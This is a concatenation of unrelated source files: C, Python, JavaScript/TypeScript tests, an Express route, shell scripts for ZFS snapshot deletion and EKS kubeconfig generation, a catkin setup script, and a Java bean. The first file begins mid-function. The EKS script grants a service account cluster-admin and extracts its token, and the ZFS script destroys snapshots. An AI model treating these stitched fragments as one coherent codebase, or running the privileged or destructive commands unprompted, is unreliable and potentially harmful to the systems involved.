		 filters->excludeSchemaList.count > 0))
	{
		log_error("Filtering setup in \"%s\" contains "
				  "%d entries in \"%s\" section and %d entries in \"%s\" "
				  "sections, please use only one of those.",
				  filename,
				  filters->includeOnlyTableList.count,
				  "include-only-table",
				  filters->excludeTableList.count,
				  "exclude-table");
		return false;
	}

	/*
	 * Now assign a proper type to the source filter.
	 */
	if (filters->includeOnlyTableList.count > 0)
	{
		filters->type = SOURCE_FILTER_TYPE_INCL;
	}
	else if (filters->excludeSchemaList.count > 0 ||
			 filters->excludeTableList.count > 0 ||
			 filters->excludeTableDataList.count > 0)
	{
		filters->type = SOURCE_FILTER_TYPE_EXCL;
	}
	else if (filters->excludeIndexList.count > 0)
	{
		/*
		 * If we reach this part of the code, it means we didn't include-only
		 * tables nor exclude any table (exclude-schema, exclude-table,
		 * exclude-table-data have not been used in the filtering setup), still
		 * the exclude-index clause has been used.
		 */
		filters->type = SOURCE_FILTER_TYPE_EXCL_INDEX;
	}
	else
	{
		filters->type = SOURCE_FILTER_TYPE_NONE;
	}

	return true;
}
/*
 * parse_filter_quoted_table_name parses a maybe-quoted qualified relation name
 * (schemaname.relname) into a pre-allocated SourceFilterTable.  Either part
 * may be surrounded by double quotes; the quotes are stripped.
 */
static bool
parse_filter_quoted_table_name(SourceFilterTable *table, const char *qname)
{
	if (qname == NULL || qname[0] == '\0')
	{
		log_error("Failed to parse empty qualified name");
		return false;
	}

	/* NOTE(review): only the first dot is considered, so a quoted schema
	 * name that itself contains a dot would be split at the wrong place --
	 * confirm whether such names are expected */
	char *dot = strchr(qname, '.');

	if (dot == NULL)
	{
		log_error("Failed to find a dot separator in qualified name \"%s\"",
				  qname);
		return false;
	}
	else if (dot == qname)
	{
		log_error("Failed to parse qualified name \"%s\": it starts with a dot",
				  qname);
		return false;
	}

	/* a schema name that opens a quote must close it right before the dot */
	if (qname[0] == '"' && *(dot - 1) != '"')
	{
		char str[BUFSIZE] = { 0 };

		strlcpy(str, qname, Min(dot - qname, sizeof(str)));

		log_error("Failed to parse quoted relation name: %s", str);
		return false;
	}

	/* skip the opening/closing quotes, when present */
	char *nspnameStart = qname[0] == '"' ? (char *) qname + 1 : (char *) qname;
	char *nspnameEnd = *(dot - 1) == '"' ? dot - 1 : dot;

	/* strlcpy's size argument includes the NUL terminator, so the +1 copies
	 * exactly the (nspnameEnd - nspnameStart) schema-name characters */
	size_t nsplen = nspnameEnd - nspnameStart + 1;

	if (strlcpy(table->nspname, nspnameStart, nsplen) >= sizeof(table->nspname))
	{
		/* NOTE(review): strlcpy returns strlen(nspnameStart) -- the length of
		 * everything up to the end of qname, not just the schema part -- so
		 * this check may also fire for a short schema followed by a long
		 * relation name; confirm intended behaviour */
		char str[BUFSIZE] = { 0 };

		strlcpy(str, nspnameStart, Min(nsplen, sizeof(str)));

		log_error("Failed to parse schema name \"%s\" (%lu bytes long), "
				  "pgcopydb and Postgres only support names up to %lu bytes",
				  str,
				  nsplen,
				  sizeof(table->nspname));
		return false;
	}

	if (strcmp(dot, ".") == 0)
	{
		log_error("Failed to parse empty relation name after the dot in \"%s\"",
				  qname);
		return false;
	}

	char *ptr = dot + 1;
	char *end = strchr(ptr, '\0');

	/* a relation name that opens a quote must close it at the very end */
	if (ptr[0] == '"' && *(end - 1) != '"')
	{
		char str[BUFSIZE] = { 0 };

		strlcpy(str, ptr, Min(end - ptr, sizeof(str)));

		log_error("Failed to parse quoted relation name: %s", str);
		return false;
	}

	char *relnameStart = ptr[0] == '"' ? ptr + 1 : ptr;
	char *relnameEnd = *(end - 1) == '"' ? end - 1 : end;
	size_t rellen = relnameEnd - relnameStart + 1;

	if (strlcpy(table->relname, relnameStart, rellen) >= sizeof(table->relname))
	{
		log_error("Failed to parse relation name \"%s\" (%lu bytes long), "
				  "pgcopydb and Postgres only support names up to %lu bytes",
				  ptr,
				  rellen,
				  sizeof(table->relname));
		return false;
	}

	return true;
}
|
<filename>lib/car/obj/src/cals_flag_e.c
/* **** Notes
Flag
//*/
# define CALEND
# define CAR
# include "../../../incl/config.h"

/*
 * cals_flag_e -- handle the "flag" action for the given argument block.
 * Returns 1 (0x01) on success, 0 (0x00) on any failure.
 *
 * NOTE(review): R() and OR() are presumably field-access and bitwise-or
 * helper macros from config.h -- confirm their exact semantics there.
 */
signed(__cdecl cals_flag_e(cals_t(*argp))) {
	auto signed char **argv;
	auto cals_event_t event;
	auto signed i,r;

	/* refuse a NULL argument block */
	if(!argp) return(0x00);

	r = cals_init_event(&event);
	if(!r) {
		printf("%s \n","<< Error at fn. cals_init_event()");
		return(0x00);
	}

	/* carry the VERBOSE flag over from the argument block into the event */
	if(CALS_VERBOSE&(R(flag,*argp))) OR(R(flag,event),CALS_VERBOSE);

	/* NOTE(review): argv is looked up through a CLI_BASE offset without any
	 * bounds check -- confirm the upstream guarantees on this index */
	argv = (*(CLI_BASE+(R(argv,R(property,*argp)))));
	if(!argv) return(0x00);

	r = cals_entry(argv,&event);
	if(!r) {
		printf("%s \n","<< Error at fn. cals_entry()");
		return(0x00);
	}

	/* set the QUIT flag on the argument block before returning success */
	OR(R(flag,*argp),CALS_QUIT);
	return(0x01);
}
|
#ifndef __C99INT_H__
#define __C99INT_H__

/*
 * Minimal <stdint.h> replacement for pre-2013 MSVC compilers.
 * Visual Studio 2013+ (_MSC_VER >= 1800) supports (some of) the c99
 * standard, so it gets the real <stdint.h>.
 */
#if defined(_MSC_VER) && _MSC_VER < 1800
typedef __int8 int8_t;
typedef unsigned __int8 uint8_t;
typedef __int16 int16_t;
typedef unsigned __int16 uint16_t;
typedef __int32 int32_t;
typedef unsigned __int32 uint32_t;
typedef __int64 int64_t;
typedef unsigned __int64 uint64_t;

/* Limit macros for the fixed-width types above; the (-N - 1) forms avoid
 * writing literals outside the signed range.  Previously only the 16- and
 * 32-bit signed limits were provided, leaving the other typedefs without
 * their C99 companion macros. */
# define INT8_MIN (-127 - 1)
# define INT8_MAX (127)
# define INT16_MIN (-32767 - 1)
# define INT16_MAX (32767)
# define INT32_MIN (-2147483647L - 1)
# define INT32_MAX (2147483647L)
# define INT64_MIN (-9223372036854775807i64 - 1)
# define INT64_MAX (9223372036854775807i64)
# define UINT8_MAX (0xff)
# define UINT16_MAX (0xffff)
# define UINT32_MAX (0xffffffffUL)
# define UINT64_MAX (0xffffffffffffffffui64)
#else
# include <stdint.h>
#endif

#endif /* ifndef __C99INT_H__ */
|
class Gobo:
    """A simple enemy entity with a 2-D position and a hit-point counter."""

    def __init__(self, x, y, health):
        self.x = x
        self.y = y
        self.health = health

    def move(self, new_x, new_y):
        """Place the Gobo at the given coordinates."""
        self.x, self.y = new_x, new_y

    def take_damage(self, damage):
        """Reduce health by ``damage`` (may drop below zero)."""
        self.health -= damage

    def is_alive(self):
        """Return True while health is strictly positive."""
        return self.health > 0

    def collision(self, other, point):
        """Dispatch collision handling based on the other entity's type."""
        if isinstance(other, Gobo):
            pass  # Gobo-vs-Gobo collision: not implemented yet
        elif isinstance(other, Player):
            pass  # Gobo-vs-Player collision: not implemented yet
class Player:
    """The player-controlled entity with a 2-D position and hit points."""

    def __init__(self, x, y, health):
        self.x = x
        self.y = y
        self.health = health

    def move(self, new_x, new_y):
        """Place the player at the given coordinates."""
        self.x, self.y = new_x, new_y

    def attack(self, target):
        """Attack ``target``."""
        pass  # attack logic not implemented yet

    def is_alive(self):
        """Return True while health is strictly positive."""
        return self.health > 0

    def collision(self, other, point):
        """Dispatch collision handling based on the other entity's type."""
        if isinstance(other, Gobo):
            pass  # Player-vs-Gobo collision: not implemented yet
        elif isinstance(other, Player):
            pass  # Player-vs-Player collision: not implemented yet
<filename>packages/styled-components/src/models/test/ThemeProvider.test.js
// @flow
/* eslint-disable react/no-multi-comp */
// Unit tests for ThemeProvider: child rendering, theme merging across nested
// providers, independence of sibling providers, and propagation of updates.
import React from 'react';
import TestRenderer from 'react-test-renderer';
import ThemeProvider from '../ThemeProvider';
import withTheme from '../../hoc/withTheme';
import { resetStyled } from '../../test/utils';

let styled;

describe('ThemeProvider', () => {
  beforeEach(() => {
    // Fresh styled instance per test so component counters don't leak between tests.
    styled = resetStyled();
  });

  it('should not throw an error when no children are passed', () => {
    TestRenderer.create(<ThemeProvider theme={{}} />);
  });

  it("should accept a theme prop that's a plain object", () => {
    TestRenderer.create(<ThemeProvider theme={{ main: 'black' }} />);
  });

  it('should render its child', () => {
    const child = <p>Child!</p>;
    const wrapper = TestRenderer.create(
      <ThemeProvider theme={{ main: 'black' }}>{child}</ThemeProvider>
    );

    expect(wrapper.toJSON()).toMatchSnapshot();
  });

  it('should merge its theme with an outer theme', () => {
    const outerTheme = { main: 'black' };
    const innerTheme = { secondary: 'black' };

    const MyDiv = styled.div``;
    const MyDivWithTheme = withTheme(MyDiv);

    const wrapper = TestRenderer.create(
      <ThemeProvider theme={outerTheme}>
        <ThemeProvider theme={innerTheme}>
          <MyDivWithTheme />
        </ThemeProvider>
      </ThemeProvider>
    );

    // Inner provider wins on conflicts; non-conflicting keys are merged.
    expect(wrapper.root.findByType(MyDiv).props.theme).toEqual({
      ...outerTheme,
      ...innerTheme,
    });
  });

  it('should merge its theme with multiple outer themes', () => {
    const outerestTheme = { main: 'black' };
    const outerTheme = { main: 'blue' };
    const innerTheme = { secondary: 'black' };

    const MyDiv = styled.div``;
    const MyDivWithTheme = withTheme(MyDiv);

    const wrapper = TestRenderer.create(
      <ThemeProvider theme={outerestTheme}>
        <ThemeProvider theme={outerTheme}>
          <ThemeProvider theme={innerTheme}>
            <MyDivWithTheme />
          </ThemeProvider>
        </ThemeProvider>
      </ThemeProvider>
    );

    expect(wrapper.root.findByType(MyDiv).props.theme).toEqual({
      ...outerestTheme,
      ...outerTheme,
      ...innerTheme,
    });
  });

  it('should be able to render two independent themes', () => {
    const themes = {
      one: { main: 'black', secondary: 'red' },
      two: { main: 'blue', other: 'green' },
    };

    const MyDivOne = withTheme(styled.div``);
    const MyDivWithThemeOne = withTheme(MyDivOne);
    const MyDivTwo = withTheme(styled.div``);
    const MyDivWithThemeTwo = withTheme(MyDivTwo);

    const wrapper = TestRenderer.create(
      <div>
        <ThemeProvider theme={themes.one}>
          <MyDivWithThemeOne />
        </ThemeProvider>
        <ThemeProvider theme={themes.two}>
          <MyDivWithThemeTwo />
        </ThemeProvider>
      </div>
    );

    // Sibling providers must not bleed into each other.
    expect(wrapper.root.findByType(MyDivOne).props.theme).toEqual(themes.one);
    expect(wrapper.root.findByType(MyDivTwo).props.theme).toEqual(themes.two);
  });

  it('ThemeProvider propagates theme updates through nested ThemeProviders', () => {
    const theme = { themed: true };
    // A function theme receives the outer theme and returns the merged one.
    const augment = outerTheme => Object.assign({}, outerTheme, { augmented: true });
    const update = { updated: true };
    let actual;
    const expected = { themed: true, augmented: true, updated: true };

    const MyDiv = styled.div``;
    const MyDivWithTheme = withTheme(MyDiv);
    const getJSX = (givenTheme = theme) => (
      <ThemeProvider theme={givenTheme}>
        <ThemeProvider theme={augment}>
          <MyDivWithTheme />
        </ThemeProvider>
      </ThemeProvider>
    );

    const wrapper = TestRenderer.create(getJSX());

    // Re-render with an updated outer theme; the augmenting inner provider
    // should see and pass through the new keys.
    wrapper.update(getJSX(Object.assign({}, theme, update)));

    expect(wrapper.root.findByType(MyDiv).props.theme).toEqual(expected);
  });
});
|
import { Router } from "express";
import { processCreditcardPayment } from "./../services/dataHandler";
import CreditCardExpiredError from "./../errors/CreditCardExpiredError";
import Jaeger from "./../jaeger";
import CircuitBreaker from "opossum";

const router = Router();

// Circuit-breaker tuning for calls into the payment processor.
const opossumOptions = {
  timeout: 15000, // If our function takes longer than 15 seconds, trigger a failure
  errorThresholdPercentage: 50, // When 50% of requests fail, trip the circuit
  resetTimeout: 30000, // After 30 seconds, try again.
};

// Every charge request goes through the breaker so a failing processor
// fails fast instead of piling up timeouts.
const breaker = new CircuitBreaker(processCreditcardPayment, opossumOptions);

// TODO: fix jaeger and replace context
const context = {};

/**
 * POST /api/v1/payment/charge
 * @summary Payment Service Stub
 * @bodyContent {Charge} application/json
 * @bodyRequired
 * @bodyDescription This is the JSON body required when calling the payment service for Bee Travels
 * @response 200 - Success
 * @response 403 - Invalid query
 * @response 404 - Database not found
 * @response 500 - Internal server error
 */
router.post("/charge", async (req, res, next) => {
  // const context = new Jaeger("charge", req, res);
  const data = req.body;
  try {
    const postProcCCresult = await breaker.fire(data);
    return res.json(postProcCCresult);
  } catch (e) {
    // Expired cards are reported as a client error; everything else is
    // delegated to the error-handling middleware.
    // NOTE(review): the route doc above lists 403/404/500 but not 400 -- confirm.
    if (e instanceof CreditCardExpiredError) {
      return res.status(400).json({ error: e.message });
    }
    next(e);
  }
});

export default router;
|
#include <cmath>

// Interpolate between two angles (radians) along the shortest arc.
// The angular difference is first wrapped into [-pi, pi]; t = 0 yields
// startAngle and t = 1 the (wrapped) end angle, so the result never
// travels the long way around the circle.
double slerp(double startAngle, double endAngle, double t) {
    const double PI = 3.14159265358979323846;

    double delta = endAngle - startAngle;
    if (delta > PI) {
        delta -= 2.0 * PI;
    } else if (delta < -PI) {
        delta += 2.0 * PI;
    }
    return startAngle + t * delta;
}
#! /bin/sh

# https://gist.github.com/SkyWriter/58e36bfaa9eea1d36460
# For each of the above filesystems, delete empty snapshots except the latest snapshot

FIRST_RELEASE=2017-08-25
VERSION=1.0
PROJECT_PAGES="https://github.com/Josef-Friedrich/zfs-delete-empty-snapshots.sh"
SHORT_DESCRIPTION='Delete empty ZFS snapshots in a secure manner.'
USAGE="Usage: zfs-delete-empty-snapshots.sh <dataset>
$SHORT_DESCRIPTION
"

# List every dataset under $1 that has at least one snapshot
# (dataset names are recovered from the snapshot names, then de-duplicated).
_get_datasets() {
	zfs list -H -r -p -t snapshot "$1" | \
		grep '@' | \
		cut -d '@' -f 1 | \
		uniq
}

# Print the names of snapshots of dataset $1 whose USED is 0, ordered by
# creation time; sed '$d' drops the last line so the most recent snapshot
# is always kept.
_get_empty_snapshots() {
	# -p Display numbers in parsable (exact) values.
	zfs list -H -r -p -d1 -t snapshot -o name,used -s creation "$1" | \
		sed '$d' | \
		awk ' $2 == "0" { print $1 }'
}

## This SEPARATOR is required for test purposes. Please don’t remove! ##

if [ -z "$1" ]; then
	echo "$USAGE" >&2
	exit 1
fi

DATASETS=$(_get_datasets "$1")

for DATASET in $DATASETS ; do
	SNAPSHOTS=$(_get_empty_snapshots "$DATASET")
	for SNAPSHOT in $SNAPSHOTS ; do
		# See https://www.mail-archive.com/zfs-discuss@opensolaris.org/msg17752.html"
		# -p Display numbers in parsable (exact) values.
		# Re-check USED immediately before destroying: the value may have
		# changed since the candidate list was built.
		USED=$(zfs list -H -p -o used "$SNAPSHOT")
		if [ "$USED" = "0" ]; then
			echo "Destroying empty snapshot “$SNAPSHOT”! (USED=$USED)"
			zfs destroy "$SNAPSHOT"
		fi
	done
done
|
#!/usr/bin/env sh
# generated from catkin/cmake/template/setup.sh.in

# Sets various environment variables and sources additional environment hooks.
# It tries it's best to undo changes from a previously sourced setup file before.
# Supported command line options:
# --extend: skips the undoing of changes from a previously sourced setup file
# --local: only considers this workspace but not the chained ones
# In plain sh shell which doesn't support arguments for sourced scripts you can
# set the environment variable `CATKIN_SETUP_UTIL_ARGS=--extend/--local` instead.

# since this file is sourced either use the provided _CATKIN_SETUP_DIR
# or fall back to the destination set at configure time
: ${_CATKIN_SETUP_DIR:=/home/ossome/obstacle_avoidance/catkin_ws/install}
_SETUP_UTIL="$_CATKIN_SETUP_DIR/_setup_util.py"
unset _CATKIN_SETUP_DIR

if [ ! -f "$_SETUP_UTIL" ]; then
  echo "Missing Python script: $_SETUP_UTIL"
  return 22
fi

# detect if running on Darwin platform
_UNAME=`uname -s`
_IS_DARWIN=0
if [ "$_UNAME" = "Darwin" ]; then
  _IS_DARWIN=1
fi
unset _UNAME

# make sure to export all environment variables
export CMAKE_PREFIX_PATH
# Darwin uses DYLD_LIBRARY_PATH instead of LD_LIBRARY_PATH.
if [ $_IS_DARWIN -eq 0 ]; then
  export LD_LIBRARY_PATH
else
  export DYLD_LIBRARY_PATH
fi
unset _IS_DARWIN
export PATH
export PKG_CONFIG_PATH
export PYTHONPATH

# remember type of shell if not already set
if [ -z "$CATKIN_SHELL" ]; then
  CATKIN_SHELL=sh
fi

# invoke Python script to generate necessary exports of environment variables
# use TMPDIR if it exists, otherwise fall back to /tmp
if [ -d "${TMPDIR:-}" ]; then
  _TMPDIR="${TMPDIR}"
else
  _TMPDIR=/tmp
fi
_SETUP_TMP=`mktemp "${_TMPDIR}/setup.sh.XXXXXXXXXX"`
unset _TMPDIR
# NOTE(review): $? here reflects the `unset` above, not `mktemp`; the
# `! -f` test still catches a failed mktemp (empty _SETUP_TMP) -- confirm.
if [ $? -ne 0 -o ! -f "$_SETUP_TMP" ]; then
  echo "Could not create temporary file: $_SETUP_TMP"
  return 1
fi
CATKIN_SHELL=$CATKIN_SHELL "$_SETUP_UTIL" $@ ${CATKIN_SETUP_UTIL_ARGS:-} >> "$_SETUP_TMP"
_RC=$?
if [ $_RC -ne 0 ]; then
  if [ $_RC -eq 2 ]; then
    echo "Could not write the output of '$_SETUP_UTIL' to temporary file '$_SETUP_TMP': may be the disk if full?"
  else
    echo "Failed to run '\"$_SETUP_UTIL\" $@': return code $_RC"
  fi
  unset _RC
  unset _SETUP_UTIL
  rm -f "$_SETUP_TMP"
  unset _SETUP_TMP
  return 1
fi
unset _RC
unset _SETUP_UTIL
# source the generated exports, then discard the temporary file
. "$_SETUP_TMP"
rm -f "$_SETUP_TMP"
unset _SETUP_TMP

# source all environment hooks
_i=0
while [ $_i -lt $_CATKIN_ENVIRONMENT_HOOKS_COUNT ]; do
  eval _envfile=\$_CATKIN_ENVIRONMENT_HOOKS_$_i
  unset _CATKIN_ENVIRONMENT_HOOKS_$_i
  eval _envfile_workspace=\$_CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
  unset _CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
  # set workspace for environment hook
  CATKIN_ENV_HOOK_WORKSPACE=$_envfile_workspace
  . "$_envfile"
  unset CATKIN_ENV_HOOK_WORKSPACE
  _i=$((_i + 1))
done
unset _i
unset _CATKIN_ENVIRONMENT_HOOKS_COUNT
|
// Query the Turbot GraphQL API for the titles of all resources, using
// basic-auth credentials taken from the environment.
const { GraphQLClient } = require('graphql-request');
const btoa = require("btoa");

async function main() {
  // Endpoint and access keys come from the environment; none are validated
  // here, so a missing variable surfaces as a request failure.
  const endpoint = process.env.TURBOT_GRAPHQL_ENDPOINT;
  const accessKeyId = process.env.TURBOT_ACCESS_KEY_ID;
  const secretAccessKey = process.env.TURBOT_SECRET_ACCESS_KEY;

  const graphQLClient = new GraphQLClient(endpoint, {
    headers: {
      // HTTP Basic auth: base64("keyId:secret")
      authorization: 'Basic ' + btoa(`${accessKeyId}:${secretAccessKey}`)
    }
  });

  const query = `
  {
    resources {
      items {
        title
      }
    }
  }
  `;

  const variables = {};

  const data = await graphQLClient.request(query, variables)

  console.log(JSON.stringify(data, null, 2))
}

main().catch(error => console.error(error))
#!/bin/bash
# update/generate kubernetes config file to access eks cluster
set -e

CURDIR=`dirname $0`

# Defaults; each can be overridden via a command-line flag (see process_args).
EKS_NAME=eks
SPINNAKER_MANAGED=false
export AWS_DEFAULT_REGION=us-east-1
export KUBECONFIG=$CURDIR/kubeconfig
# Print a one-line usage summary for this script.
print_usage() {
    echo "Usage: $0 -k <kubeconfig-path> -n(name) <eks-name> -r(region) <aws-region> -s(spinnaker-managed) <true|false>"
}
# Parse command-line flags into the script's globals:
#   -n  EKS cluster name         (EKS_NAME)
#   -r  AWS region               (AWS_DEFAULT_REGION)
#   -k  kubeconfig output path   (KUBECONFIG)
#   -s  spinnaker-managed toggle (SPINNAKER_MANAGED)
# Unrecognized flags are reported on stderr but do not abort.
function process_args() {
    # Fixed: inside [[ ]], '<' is a lexicographic *string* comparison; use an
    # arithmetic test for the argument count. `exit -1` is also not a valid
    # exit status, so exit with 1.
    if [ $# -lt 1 ]; then
        print_usage
        exit 1
    fi
    # NOTE(review): the optstring also accepts -a but no case handles it --
    # confirm whether `a:` can be dropped.
    while getopts ":n:a:r:k:s:" opt; do
        case $opt in
            n) EKS_NAME="$OPTARG"
            ;;
            r) AWS_DEFAULT_REGION="$OPTARG"
            ;;
            k) KUBECONFIG="$OPTARG"
            ;;
            s) SPINNAKER_MANAGED="$OPTARG"
            ;;
            \?)
            >&2 echo "Unrecognized argument '$OPTARG'"
            ;;
        esac
    done
}
# (Re)generate the kubeconfig for the cluster and, when Spinnaker-managed,
# add a dedicated service-account context and minify the file down to it.
function init() {
    # start from a clean kubeconfig file
    if [ -e $KUBECONFIG ]; then
        rm $KUBECONFIG
    fi
    # update kubeconfig
    aws eks update-kubeconfig --name $EKS_NAME
    if [ $SPINNAKER_MANAGED = "true" ]; then
        local namespace=$EKS_NAME
        local serviceaccount=spinnaker-managed
        rbac $namespace $serviceaccount
        minify $namespace
    fi
    # restrict access
    chmod 600 $KUBECONFIG
}
# Create a namespace plus a cluster-admin service account, then register the
# account's token as a kubectl credential and add a matching context.
# $1 = namespace, $2 = service account name.
function rbac() {
    local namespace=$1
    local serviceaccount=$2
    cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Namespace
metadata:
  name: $namespace
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: $serviceaccount
  namespace: $namespace
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: $serviceaccount
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: $serviceaccount
  namespace: $namespace
EOF
    # Pull the service account's token out of its secret and register it.
    # NOTE(review): .secrets[0] relies on auto-created SA token secrets
    # (removed in Kubernetes 1.24+) -- confirm the target cluster version.
    token=$(kubectl get secret \
        $(kubectl get serviceaccount $serviceaccount \
        -n $namespace \
        -o jsonpath='{.secrets[0].name}') \
        -n $namespace \
        -o jsonpath='{.data.token}' | base64 --decode)
    kubectl config set-credentials $serviceaccount --token=$token
    kubectl config set-context $namespace \
        --cluster=$(kubectl config current-context) \
        --user=$serviceaccount \
        --namespace=$namespace
}
# Reduce the kubeconfig to just the given context: flatten embedded data and
# drop unrelated clusters/users, writing the result back to $KUBECONFIG.
function minify () {
    local context=$1
    kubectl config view --raw > $KUBECONFIG.full.tmp
    kubectl --kubeconfig $KUBECONFIG.full.tmp config use-context $context
    kubectl --kubeconfig $KUBECONFIG.full.tmp \
        config view --flatten --minify > $KUBECONFIG
    rm $KUBECONFIG.full.tmp
}
# main
process_args "$@"
init
# Do not leak the script's defaults into the caller's environment.
unset AWS_DEFAULT_REGION
unset KUBECONFIG
|
#!/usr/bin/env bash
# NOTE(review): presumably sourced by a CI test runner that consumes
# PHP_VERSION_MIN/MAX and COMPOSER_REQUIRE -- confirm the consumer.
# Targets PHP 7.3 with Doctrine and Symfony 3.3 components.
PHP_VERSION_MIN="70300"
PHP_VERSION_MAX="70399"

# Packages appended to the composer require list, one per assignment.
COMPOSER_REQUIRE="$COMPOSER_REQUIRE doctrine/dbal:~2.5"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE doctrine/orm:~2.6.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE doctrine/doctrine-bundle"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/config:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/console:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/dependency-injection:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/doctrine-bridge:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/framework-bundle:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/http-kernel:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/yaml:~3.3"

DBAL='doctrine'
|
<gh_stars>0
package com.acgist.snail.pojo.message;
import com.acgist.snail.net.torrent.tracker.TrackerLauncher;
import com.acgist.snail.utils.BeanUtils;
/**
 * Tracker scrape response message.
 *
 * <p>UDP:http://www.bittorrent.org/beps/bep_0048.html</p>
 * <p>HTTP:https://wiki.theory.org/index.php/BitTorrentSpecification</p>
 *
 * @author acgist
 */
public final class ScrapeMessage {

	/**
	 * <p>Message ID</p>
	 *
	 * @see TrackerLauncher#id()
	 */
	private Integer id;
	/**
	 * <p>Number of seeding peers</p>
	 */
	private Integer seeder;
	/**
	 * <p>Number of downloading (leeching) peers</p>
	 */
	private Integer leecher;
	/**
	 * <p>Number of peers that completed the download</p>
	 */
	private Integer completed;

	/**
	 * <p>Get the message ID</p>
	 *
	 * @return the ID
	 */
	public Integer getId() {
		return this.id;
	}

	/**
	 * <p>Set the message ID</p>
	 *
	 * @param id the ID
	 */
	public void setId(Integer id) {
		this.id = id;
	}

	/**
	 * <p>Get the number of seeding peers</p>
	 *
	 * @return seeding peer count
	 */
	public Integer getSeeder() {
		return this.seeder;
	}

	/**
	 * <p>Set the number of seeding peers</p>
	 *
	 * @param seeder seeding peer count
	 */
	public void setSeeder(Integer seeder) {
		this.seeder = seeder;
	}

	/**
	 * <p>Get the number of downloading peers</p>
	 *
	 * @return downloading peer count
	 */
	public Integer getLeecher() {
		return this.leecher;
	}

	/**
	 * <p>Set the number of downloading peers</p>
	 *
	 * @param leecher downloading peer count
	 */
	public void setLeecher(Integer leecher) {
		this.leecher = leecher;
	}

	/**
	 * <p>Get the number of completed peers</p>
	 *
	 * @return completed peer count
	 */
	public Integer getCompleted() {
		return this.completed;
	}

	/**
	 * <p>Set the number of completed peers</p>
	 *
	 * @param completed completed peer count
	 */
	public void setCompleted(Integer completed) {
		this.completed = completed;
	}

	@Override
	public String toString() {
		return BeanUtils.toString(this);
	}

}
|
<gh_stars>10-100
// Unit tests for DefaultHandler (filtering / sorting / pagination / display).
// The Column class is mocked so only the handler logic is under test.
jest.mock( '../column' );

import { Column } from '../column';
import { DefaultHandler } from './default-handler';

// Shared fixture rows; `eq` is identical everywhere to exercise stable sorts.
const rows = [
	{ id: 1, user: { firstName: 'John', lastName: 'Doe' }, order: 2, eq: 42 },
	{ id: 2, user: { firstName: 'Jane', lastName: 'Doe' }, order: 1, eq: 42 },
	{ id: 3, user: { firstName: 'Foo', lastName: 'Bar' }, order: 3, eq: 42 },
];
type RowType = typeof rows[0];

// Columns cover plain fields, a nested path, and a computed representation.
const columns = [
	new Column( { label: '', field: 'id' } ),
	new Column( { label: '', field: 'user.lastName' } ),
	new Column( { label: '', representedAs: ( row: any ) => row.user.firstName + row.user.lastName } ),
	new Column( { label: '', field: 'order' } ),
	new Column( { label: '', field: 'eq' } ),
];

it( 'has the correct methods', () => {
	const handler = new DefaultHandler();

	expect( typeof handler.filterHandler ).toBe( 'function' );
	expect( typeof handler.sortHandler ).toBe( 'function' );
	expect( typeof handler.paginateHandler ).toBe( 'function' );
	expect( typeof handler.displayHandler ).toBe( 'function' );
} );
describe( 'can filter data', () => {
	it( 'Filter data with nil value or empty array should directly return input', async () => {
		const handler = new DefaultHandler<RowType>();
		const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );

		let filtered = await handler.filterHandler( rows, undefined, columns );
		expect( rowMatchSpied ).not.toHaveBeenCalled();
		expect( filtered ).toHaveLength( 3 );
		expect( filtered[0].id ).toBe( 1 );
		expect( filtered[1].id ).toBe( 2 );
		expect( filtered[2].id ).toBe( 3 );

		rowMatchSpied.mockClear();

		filtered = await handler.filterHandler( rows, [], columns );
		expect( rowMatchSpied ).not.toHaveBeenCalled();
		expect( filtered ).toHaveLength( 3 );
		expect( filtered[0].id ).toBe( 1 );
		expect( filtered[1].id ).toBe( 2 );
		expect( filtered[2].id ).toBe( 3 );
	} );
	it( 'can filter data by a single string', async () => {
		const handler = new DefaultHandler<RowType>();
		const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );

		// A space-separated string is split into words; every word must match
		// somewhere in the row (call counts reflect short-circuiting).
		let filtered = await handler.filterHandler( rows, 'jo do', columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 5 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'jo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'jo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'jo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'do', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'do', columns );
		expect( filtered ).toHaveLength( 2 );
		expect( filtered[0].id ).toBe( 1 );
		expect( filtered[1].id ).toBe( 2 );

		rowMatchSpied.mockClear();

		// Matches the concatenated representedAs value ("JaneDoe").
		filtered = await handler.filterHandler( rows, 'nedo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 3 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'nedo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'nedo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'nedo', columns );
		expect( filtered ).toHaveLength( 1 );
		expect( filtered[0].id ).toBe( 2 );

		rowMatchSpied.mockClear();

		filtered = await handler.filterHandler( rows, 'bogus', columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 3 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'bogus', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'bogus', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'bogus', columns );
		expect( filtered ).toHaveLength( 0 );

		rowMatchSpied.mockClear();

